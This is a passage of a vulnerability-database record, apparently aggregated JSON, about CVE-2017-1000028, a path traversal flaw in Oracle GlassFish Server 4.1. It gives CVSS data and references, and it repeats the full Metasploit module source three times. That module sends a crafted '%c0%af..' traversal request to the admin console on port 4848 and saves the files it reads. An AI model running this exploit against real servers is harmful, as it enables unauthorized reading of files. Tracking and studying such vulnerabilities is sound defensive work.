"AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2017-1000028", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://nvd.nist.gov/vuln/detail/CVE-2017-1000028", "https://launchpad.net/bugs/cve/CVE-2017-1000028", "https://security-tracker.debian.org/tracker/CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-11-22T21:41:22", "history": [{"bulletin": {"id": "UB:CVE-2017-1000028", "vendorId": null, "hash": "75c048a8f8351817fd4aa727eeb60ede", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both\nauthenticated and unauthenticated Directory Traversal vulnerability, that\ncan be exploited by issuing a specially crafted HTTP GET request.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | vulnerable code not present in package.\n", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2017-1000028", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://nvd.nist.gov/vuln/detail/CVE-2017-1000028", "https://launchpad.net/bugs/cve/CVE-2017-1000028", "https://security-tracker.debian.org/tracker/CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": 
"2021-06-30T22:29:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2021-06-30T22:29:52", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-06-30T22:29:52", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "glassfish"}], "bugs": []}, "lastseen": "2021-06-30T22:29:52", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2017-1000028", "vendorId": null, "hash": "c0ab08e44d331fc13f7ea7da1851a54d", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both\nauthenticated and unauthenticated Directory Traversal vulnerability, that\ncan be exploited by issuing a specially crafted HTTP GET request.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | vulnerable code not present in package.\n", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": 
false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2017-1000028", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://nvd.nist.gov/vuln/detail/CVE-2017-1000028", "https://launchpad.net/bugs/cve/CVE-2017-1000028", "https://security-tracker.debian.org/tracker/CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-07-30T23:47:07", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2021-07-30T23:47:07", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-07-30T23:47:07", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "glassfish"}], "bugs": []}, "lastseen": "2021-07-30T23:47:07", "differentElements": ["affectedPackage"], "edition": 2}], 
"viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}], "modified": "2021-11-22T21:41:22", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-11-22T21:41:22", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "glassfish"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "exploitdb": [{"id": "EDB-ID:45196", "hash": "20efe3749413b57dc1af54e8358fe1745c0c6b595dfe41f56e2cf9724d231824", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)", "description": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit). CVE-2017-1000028. Webapps exploit for Windows platform. 
Tags: Metasploit Frame...", "published": "2018-08-14T00:00:00", "modified": "2018-08-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/45196/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-08-14T17:28:41", "history": [{"lastseen": "2018-08-14T17:28:41", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2018-08-14T17:28:41", "references": [], "description": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit). CVE-2017-1000028. Webapps exploit for Windows platform. Tags: Metasploit Frame...", "edition": 1, "cvss3": {}, "reporter": "Exploit-DB", "history": [], "published": "2018-08-14T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2018-08-14T17:28:41", "vector": "NONE", "value": 6.1}, "dependencies": {"rev": 2, "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45198"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-08-14T17:28:41"}}, "title": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "modified": "2018-08-14T00:00:00", "href": "https://www.exploit-db.com/exploits/45196/", "id": "EDB-ID:45196", "viewCount": 58, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": 
"247e3e74151deb051bb07e106e21073b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "published"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "48f667a82f1161ef92ad8479a776b974", "key": "description"}, {"hash": "16a44243a5e846a464c070e955d715cf", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "5ed2b97009adfb56ee6766139303094f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "hash": "5e54dc2734a8f27e754ad0a139fba198fb6b8124a26f3cc0db2fb044db528089"}}], "viewCount": 59, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-08-14T17:28:41", "rev": 2}, "dependencies": {"references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45198"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-08-14T17:28:41", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/45196/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',\r\n 'Description' => %q{\r\n 
This module exploits an unauthenticated directory traversal vulnerability\r\n which exits in administration console of Oracle GlassFish Server 4.1, which is\r\n listening by default on port 4848/TCP.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2017-1000028'],\r\n ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],\r\n ['EDB', '39441']\r\n ],\r\n 'Author' =>\r\n [\r\n 'Trustwave SpiderLabs', # Vulnerability discovery\r\n 'Dhiraj Mishra' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Aug 08 2015',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(4848),\r\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\r\n OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])\r\n ])\r\n end\r\n\r\n def run_host(ip)\r\n filename = datastore['FILEPATH']\r\n traversal = \"%c0%af..\" * datastore['DEPTH'] << filename\r\n\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/theme/META-INF/prototype#{traversal}\"\r\n })\r\n\r\n unless res && res.code == 200\r\n print_error('Nothing was downloaded')\r\n return\r\n end\r\n\r\n vprint_good(\"#{peer} - #{res.body}\")\r\n path = store_loot(\r\n 'oracle.traversal',\r\n 'text/plain',\r\n ip,\r\n res.body,\r\n filename\r\n )\r\n print_good(\"File saved in: #{path}\")\r\n end\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "bdf8ed67a9997025a9a245b20ac4e383"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "description", "hash": "48f667a82f1161ef92ad8479a776b974"}, {"key": "href", "hash": "16a44243a5e846a464c070e955d715cf"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "published", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "5ed2b97009adfb56ee6766139303094f"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}, {"id": "EDB-ID:45198", "hash": "3067eeae1b7d891e1b67296aacb1ab41aa83efcae373383063c3fda066b04fed", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)", "description": "", "published": "2018-08-14T00:00:00", "modified": "2018-08-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/45198", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-11-30T12:31:39", "history": 
[{"lastseen": "2018-11-30T12:31:39", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2018-11-30T12:31:39", "references": [], "description": "", "edition": 1, "cvss3": {}, "reporter": "Exploit-DB", "history": [], "published": "2018-08-14T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2018-11-30T12:31:39", "vector": "NONE", "value": 5.9}, "dependencies": {"rev": 2, "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-11-30T12:31:39"}}, "title": "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "modified": "2018-08-14T00:00:00", "href": "https://www.exploit-db.com/exploits/45198", "id": "EDB-ID:45198", "viewCount": 17, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d0932c6876ba44537f85119b65226e96", "key": "href"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "published"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": 
"description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "806e495bd0771e039988c949c33aee7b", "key": "title"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "hash": "c4a2d80c8920490e9f03ded84c9e1004beef8d20544c5e3b49b4dd5fa4fd3801"}}], "viewCount": 18, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-11-30T12:31:39", "rev": 2}, "dependencies": {"references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-11-30T12:31:39", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/45198", "sourceData": "# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)\r\n# Author: Dhiraj Mishra\r\n# Date: 2018-08-14\r\n# Software: Oracle Glassfish Server OSE\r\n# Version: 4.1\r\n# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip\r\n# CVE: 2017-1000028\r\n\r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',\r\n 'Description' => %q{\r\n This module exploits an unauthenticated directory traversal vulnerability\r\n which exits in administration console of Oracle GlassFish Server 4.1, which is\r\n listening by default on port 4848/TCP.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 
'2017-1000028'],\r\n ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],\r\n ['EDB', '39441']\r\n ],\r\n 'Author' =>\r\n [\r\n 'Trustwave SpiderLabs', # Vulnerability discovery\r\n 'Dhiraj Mishra' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Aug 08 2015',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(4848),\r\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\r\n OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])\r\n ])\r\n end\r\n\r\n def run_host(ip)\r\n filename = datastore['FILEPATH']\r\n traversal = \"%c0%af..\" * datastore['DEPTH'] << filename\r\n\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/theme/META-INF/prototype#{traversal}\"\r\n })\r\n\r\n unless res && res.code == 200\r\n print_error('Nothing was downloaded')\r\n return\r\n end\r\n\r\n vprint_good(\"#{peer} - #{res.body}\")\r\n path = store_loot(\r\n 'oracle.traversal',\r\n 'text/plain',\r\n ip,\r\n res.body,\r\n filename\r\n )\r\n print_good(\"File saved in: #{path}\")\r\n end\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "bdf8ed67a9997025a9a245b20ac4e383"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d0932c6876ba44537f85119b65226e96"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "published", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "806e495bd0771e039988c949c33aee7b"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}], "packetstorm": [{"id": "PACKETSTORM:148892", "hash": "9e367a799a16af594228201c58d5e295", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Oracle GlassFish Server 4.1 Directory Traversal", "description": "", "published": "2018-08-13T00:00:00", "modified": "2018-08-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://packetstormsecurity.com/files/148892/Oracle-GlassFish-Server-4.1-Directory-Traversal.html", "reporter": "Mishra Dhiraj", "references": [], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-08-16T02:10:28", "history": [], "viewCount": 15, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-08-16T02:10:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": 
["CVE-2017-1000028"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45198", "EDB-ID:45196"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2018-08-16T02:10:28", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://packetstormsecurity.com/files/download/148892/glassfish_traversal.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Report \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', \n'Description' => %q{ \nThis module exploits an unauthenticated directory traversal vulnerability \nwhich exits in administration console of Oracle GlassFish Server 4.1, which is \nlistening by default on port 4848/TCP. 
\n}, \n'References' => \n[ \n['CVE', '2017-1000028'], \n['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'], \n['EDB', '39441'] \n], \n'Author' => \n[ \n'Trustwave SpiderLabs', # Vulnerability discovery \n'Dhiraj Mishra' # Metasploit module \n], \n'DisclosureDate' => 'Aug 08 2015', \n'License' => MSF_LICENSE \n)) \n \nregister_options( \n[ \nOpt::RPORT(4848), \nOptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']), \nOptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) \n]) \nend \n \ndef run_host(ip) \nfilename = datastore['FILEPATH'] \ntraversal = \"%c0%af..\" * datastore['DEPTH'] << filename \n \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => \"/theme/META-INF/prototype#{traversal}\" \n}) \n \nunless res && res.code == 200 \nprint_error('Nothing was downloaded') \nreturn \nend \n \nvprint_good(\"#{peer} - #{res.body}\") \npath = store_loot( \n'oracle.traversal', \n'text/plain', \nip, \nres.body, \nfilename \n) \nprint_good(\"File saved in: #{path}\") \nend \nend \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"]}], "openvas": [{"id": "OPENVAS:1361412562310806848", "hash": "5a4f0fb2d75e4aaf07f2e64418127d4b", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2020-05-12T17:23:31", "history": 
[{"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "193ed04b82015c1810d804062ebd774e42478a483a2e29e243e3b6148693d6cc", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-10-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-10-02T14:29:56", "history": [], "viewCount": 55, "enchantments": {"dependencies": {"modified": "2018-10-02T14:29:56", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": 